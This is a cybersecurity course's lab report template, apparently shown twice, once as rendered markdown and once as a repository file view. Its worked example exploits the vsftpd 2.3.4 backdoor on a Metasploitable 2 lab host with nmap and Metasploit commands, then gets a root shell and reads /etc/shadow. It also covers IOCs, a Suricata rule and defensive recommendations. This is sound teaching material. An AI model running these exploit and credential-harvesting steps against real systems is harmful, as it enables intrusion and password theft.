LAB_REPORT_TEMPLATE.md

# LAB REPORT TEMPLATE
# Apophis Networking Security Lab

**Student Name:** ___________________________
**Module Number:** ___________________________
**Lab Title:** ___________________________
**Date Submitted:** ___________________________

---

## 1. EXECUTIVE SUMMARY (1 paragraph)

Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.

**Example:**
> This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.

---

## 2. OBJECTIVES

List the specific learning objectives for this lab.

**Example:**
- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports

---

## 3. TOOLS & ENVIRONMENT

### 3.1 Attack Platform
- **OS:** Kali Linux 2024.1
- **IP Address:** 10.10.2.50
- **Tools Used:**
  - Metasploit Framework v6.3.x
  - Nmap 7.94
  - Wireshark 4.0.x

### 3.2 Target System
- **OS:** Metasploitable 2 (Ubuntu 8.04)
- **IP Address:** 10.10.4.10
- **Vulnerable Services:**
  - vsftpd 2.3.4 (Port 21)
  - OpenSSH 4.7p1 (Port 22)
  - Apache 2.2.8 (Port 80)

### 3.3 Network Topology
```
[Kali Linux]       [pfSense Firewall]       [Metasploitable 2]
10.10.2.50 <---> 10.10.2.1 | 10.10.4.1 <---> 10.10.4.10
  VLAN 200                                         VLAN 400
  (Red Team)                                       (Victim Network)
```

---

## 4. METHODOLOGY

Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.

### 4.1 Pre-Exploitation: Reconnaissance

**Step 1: Host Discovery**
```bash
nmap -sn 10.10.4.0/24
```
**Output:**
```
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
```

**Step 2: Port Scanning**
```bash
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
```
**Output:**
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1
...
```

**Analysis:** vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523).

### 4.2 Exploitation

**Step 3: Launch Metasploit**
```bash
msfconsole -q
```

**Step 4: Select Exploit Module**
```bash
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
```

**Output:**
```
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
```

**Result:** Successful exploitation. Root shell obtained.

### 4.3 Post-Exploitation

**Step 5: Verify Access**
```bash
id
```
**Output:**
```
uid=0(root) gid=0(root)
```

**Step 6: Credential Harvesting**
```bash
cat /etc/shadow
```
**Output:** (Include first 3 lines only for report)
```
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
```

---

## 5. FINDINGS & ANALYSIS

### 5.1 Key Discoveries

**Vulnerability Identified:**
- **CVE:** CVE-2011-2523
- **Severity:** Critical (CVSS 10.0)
- **Description:** vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains `:)` smiley face.
- **Exploitability:** Trivial—no authentication required.

**Impact Assessment:**
- **Confidentiality:** HIGH—Full read access to all files including /etc/shadow
- **Integrity:** HIGH—Root access allows file modification
- **Availability:** HIGH—Attacker could delete files or crash system

### 5.2 Network Traffic Analysis

**Wireshark Observations:**
- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext

**Screenshot:** [Include Wireshark screenshot showing backdoor traffic]

---

## 6. INDICATORS OF COMPROMISE (IOCs)

| Type | Value | Description |
|------|-------|-------------|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |

---

## 7. DEFENSIVE RECOMMENDATIONS

### 7.1 Immediate Actions
1. **Patch vsftpd:** Upgrade to version 3.0.5 or disable service if not needed
2. **Network Segmentation:** Block victim network from initiating connections to Red Team VLAN
3. **IDS Rule:** Deploy Suricata signature for port 6200 connections

### 7.2 Long-Term Improvements
1. **Vulnerability Management:** Implement automated scanning (weekly)
2. **Patch Management:** Establish SLA for critical patches (24-48 hours)
3. **Firewall Rules:** Default-deny egress from victim network
4. **Security Monitoring:** Alert on connections to non-standard ports

---

## 8. DETECTION ENGINEERING

### 8.1 Suricata Rule
```
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
```

### 8.2 Security Onion Query (KQL)
```
destination.port: 6200 AND event.module: "suricata"
```

### 8.3 MITRE ATT&CK Mapping
- **Tactic:** Initial Access (TA0001)
- **Technique:** T1190 - Exploit Public-Facing Application
- **Sub-Technique:** FTP Service Exploitation

---

## 9. CHALLENGES & TROUBLESHOOTING

**Challenge 1:** Initial exploit failed with "connection refused"

**Root Cause:** VLAN tag not set correctly on VM network interface in Proxmox.

**Solution:**
```bash
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
```

**Challenge 2:** Wireshark showed no captured packets

**Root Cause:** Capturing on wrong interface (wlan0 instead of eth0).

**Solution:**
```bash
sudo tcpdump -i eth0  # Verify interface has traffic
sudo wireshark -i eth0
```

---

## 10. LESSONS LEARNED

### What Went Well
- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing

### What Could Be Improved
- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation

### Key Takeaways
1. **Offensive Perspective:** Outdated software is trivially exploitable—attackers have automated scanners for this.
2. **Defensive Perspective:** One unpatched service can compromise entire network. Defense-in-depth is critical.
3. **Forensics Importance:** Without packet capture, proving the attack vector would be difficult in IR scenario.

---

## 11. APPENDICES

### Appendix A: Command History
```bash
# Full command history from Kali terminal
history > command_history.txt
```
(Attach file: command_history.txt)

### Appendix B: Screenshots
- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection

### Appendix C: Packet Capture
(Attach file: exploitation.pcapng)

### Appendix D: Metasploit Output Log
(Attach file: msfconsole.log)

---

## 12. REFERENCES

1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/

---

## 13. DECLARATION

I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.

**Signature:** ___________________________
**Date:** ___________________________

---

**END OF LAB REPORT**

---

# GRADING RUBRIC FOR THIS REPORT

| Section | Points | Criteria |
|---------|--------|----------|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| **TOTAL** | **100** | |

**Minimum Passing Score:** 70/100
initial commit 2026-05-28 18:27:41 -06:00			`# LAB REPORT TEMPLATE`
			`# Apophis Networking Security Lab`

			`Student Name: ___________________________`
			`Module Number: ___________________________`
			`Lab Title: ___________________________`
			`Date Submitted: ___________________________`

			`---`

			`## 1. EXECUTIVE SUMMARY (1 paragraph)`

			`Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.`

			`Example:`
			`> This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.`

			`---`

			`## 2. OBJECTIVES`

			`List the specific learning objectives for this lab.`

			`Example:`
			`- Configure and execute Metasploit Framework exploits`
			`- Understand the mechanics of reverse shell payloads`
			`- Perform post-exploitation enumeration`
			`- Document exploitation chains for penetration testing reports`

			`---`

			`## 3. TOOLS & ENVIRONMENT`

			`### 3.1 Attack Platform`
			`- OS: Kali Linux 2024.1`
			`- IP Address: 10.10.2.50`
			`- Tools Used:`
			`- Metasploit Framework v6.3.x`
			`- Nmap 7.94`
			`- Wireshark 4.0.x`

			`### 3.2 Target System`
			`- OS: Metasploitable 2 (Ubuntu 8.04)`
			`- IP Address: 10.10.4.10`
			`- Vulnerable Services:`
			`- vsftpd 2.3.4 (Port 21)`
			`- OpenSSH 4.7p1 (Port 22)`
			`- Apache 2.2.8 (Port 80)`

			`### 3.3 Network Topology`
			```
			`[Kali Linux] [pfSense Firewall] [Metasploitable 2]`
			`10.10.2.50 <---> 10.10.2.1 \| 10.10.4.1 <---> 10.10.4.10`
			`VLAN 200 VLAN 400`
			`(Red Team) (Victim Network)`
			```

			`---`

			`## 4. METHODOLOGY`

			`Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.`

			`### 4.1 Pre-Exploitation: Reconnaissance`

			`Step 1: Host Discovery`
			```bash
			`nmap -sn 10.10.4.0/24`
			```
			`Output:`
			```
			`Nmap scan report for 10.10.4.10`
			`Host is up (0.00042s latency).`
			```

			`Step 2: Port Scanning`
			```bash
			`sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan`
			```
			`Output:`
			```
			`PORT STATE SERVICE VERSION`
			`21/tcp open ftp vsftpd 2.3.4`
			`22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1`
			`...`
			```

			`Analysis: vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523).`

			`### 4.2 Exploitation`

			`Step 3: Launch Metasploit`
			```bash
			`msfconsole -q`
			```

			`Step 4: Select Exploit Module`
			```bash
			`msf6 > use exploit/unix/ftp/vsftpd_234_backdoor`
			`msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10`
			`msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit`
			```

			`Output:`
			```
			`[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)`
			`[*] 10.10.4.10:6200 - Shell command shell session 1 opened`
			```

			`Result: Successful exploitation. Root shell obtained.`

			`### 4.3 Post-Exploitation`

			`Step 5: Verify Access`
			```bash
			`id`
			```
			`Output:`
			```
			`uid=0(root) gid=0(root)`
			```

			`Step 6: Credential Harvesting`
			```bash
			`cat /etc/shadow`
			```
			`Output: (Include first 3 lines only for report)`
			```
			`root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash`
			`daemon:*:14684:0:99999:7:::`
			`...`
			```

			`---`

			`## 5. FINDINGS & ANALYSIS`

			`### 5.1 Key Discoveries`

			`Vulnerability Identified:`
			`- CVE: CVE-2011-2523`
			`- Severity: Critical (CVSS 10.0)`
			- Description: vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains `:)` smiley face.
			`- Exploitability: Trivial—no authentication required.`

			`Impact Assessment:`
			`- Confidentiality: HIGH—Full read access to all files including /etc/shadow`
			`- Integrity: HIGH—Root access allows file modification`
			`- Availability: HIGH—Attacker could delete files or crash system`

			`### 5.2 Network Traffic Analysis`

			`Wireshark Observations:`
			`- TCP stream 1: FTP connection (port 21) with malicious username`
			`- TCP stream 2: Shell session on port 6200`
			`- No encryption—all commands visible in plaintext`

			`Screenshot: [Include Wireshark screenshot showing backdoor traffic]`

			`---`

			`## 6. INDICATORS OF COMPROMISE (IOCs)`

			`\| Type \| Value \| Description \|`
			`\|------\|-------\|-------------\|`
			`\| IP Address \| 10.10.2.50 \| Attacker source IP \|`
			`\| Port \| 6200 \| vsftpd backdoor listening port \|`
			`\| Process \| vsftpd \| Spawned root shell (suspicious parent) \|`
			`\| Network \| TCP SYN to 6200 \| Connection to non-standard FTP port \|`

			`---`

			`## 7. DEFENSIVE RECOMMENDATIONS`

			`### 7.1 Immediate Actions`
			`1. Patch vsftpd: Upgrade to version 3.0.5 or disable service if not needed`
			`2. Network Segmentation: Block victim network from initiating connections to Red Team VLAN`
			`3. IDS Rule: Deploy Suricata signature for port 6200 connections`

			`### 7.2 Long-Term Improvements`
			`1. Vulnerability Management: Implement automated scanning (weekly)`
			`2. Patch Management: Establish SLA for critical patches (24-48 hours)`
			`3. Firewall Rules: Default-deny egress from victim network`
			`4. Security Monitoring: Alert on connections to non-standard ports`

			`---`

			`## 8. DETECTION ENGINEERING`

			`### 8.1 Suricata Rule`
			```
			`alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)`
			```

			`### 8.2 Security Onion Query (KQL)`
			```
			`destination.port: 6200 AND event.module: "suricata"`
			```

			`### 8.3 MITRE ATT&CK Mapping`
			`- Tactic: Initial Access (TA0001)`
			`- Technique: T1190 - Exploit Public-Facing Application`
			`- Sub-Technique: FTP Service Exploitation`

			`---`

			`## 9. CHALLENGES & TROUBLESHOOTING`

			`Challenge 1: Initial exploit failed with "connection refused"`

			`Root Cause: VLAN tag not set correctly on VM network interface in Proxmox.`

			`Solution:`
			```bash
			`# Proxmox VM > Hardware > Network Device > Edit`
			`# VLAN Tag: 400 (was blank)`
			```

			`Challenge 2: Wireshark showed no captured packets`

			`Root Cause: Capturing on wrong interface (wlan0 instead of eth0).`

			`Solution:`
			```bash
			`sudo tcpdump -i eth0 # Verify interface has traffic`
			`sudo wireshark -i eth0`
			```

			`---`

			`## 10. LESSONS LEARNED`

			`### What Went Well`
			`- Successful identification and exploitation of vulnerability`
			`- Comprehensive documentation with screenshots`
			`- Effective use of network segmentation for safe testing`

			`### What Could Be Improved`
			`- Faster troubleshooting (spent 30 minutes on VLAN issue)`
			`- More thorough initial reconnaissance (missed some services)`
			`- Should have taken VM snapshot before exploitation`

			`### Key Takeaways`
			`1. Offensive Perspective: Outdated software is trivially exploitable—attackers have automated scanners for this.`
			`2. Defensive Perspective: One unpatched service can compromise entire network. Defense-in-depth is critical.`
			`3. Forensics Importance: Without packet capture, proving the attack vector would be difficult in IR scenario.`

			`---`

			`## 11. APPENDICES`

			`### Appendix A: Command History`
			```bash
			`# Full command history from Kali terminal`
			`history > command_history.txt`
			```
			`(Attach file: command_history.txt)`

			`### Appendix B: Screenshots`
			`- Screenshot 1: Nmap scan results showing vsftpd 2.3.4`
			`- Screenshot 2: Metasploit successful exploitation`
			`- Screenshot 3: Root shell access (id command output)`
			`- Screenshot 4: Wireshark PCAP showing port 6200 connection`
			`- Screenshot 5: Security Onion alert for detection`

			`### Appendix C: Packet Capture`
			`(Attach file: exploitation.pcapng)`

			`### Appendix D: Metasploit Output Log`
			`(Attach file: msfconsole.log)`

			`---`

			`## 12. REFERENCES`

			`1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523`
			`2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/`
			`3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/`
			`4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/`

			`---`

			`## 13. DECLARATION`

			`I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.`

			`Signature: ___________________________`
			`Date: ___________________________`

			`---`

			`END OF LAB REPORT`

			`---`

			`# GRADING RUBRIC FOR THIS REPORT`

			`\| Section \| Points \| Criteria \|`
			`\|---------\|--------\|----------\|`
			`\| Executive Summary \| 5 \| Clear, concise, non-technical language \|`
			`\| Methodology \| 20 \| Step-by-step, reproducible, includes commands \|`
			`\| Findings & Analysis \| 20 \| Technical depth, vulnerability details, impact \|`
			`\| Screenshots \| 15 \| Relevant, annotated, high-quality \|`
			`\| Detection Engineering \| 15 \| Custom rules, MITRE mapping, queries \|`
			`\| Defensive Recommendations \| 10 \| Actionable, prioritized, realistic \|`
			`\| Lessons Learned \| 5 \| Self-reflection, improvement mindset \|`
			`\| Documentation Quality \| 10 \| Formatting, grammar, professionalism \|`
			`\| TOTAL \| 100 \| \|`

			`Minimum Passing Score: 70/100`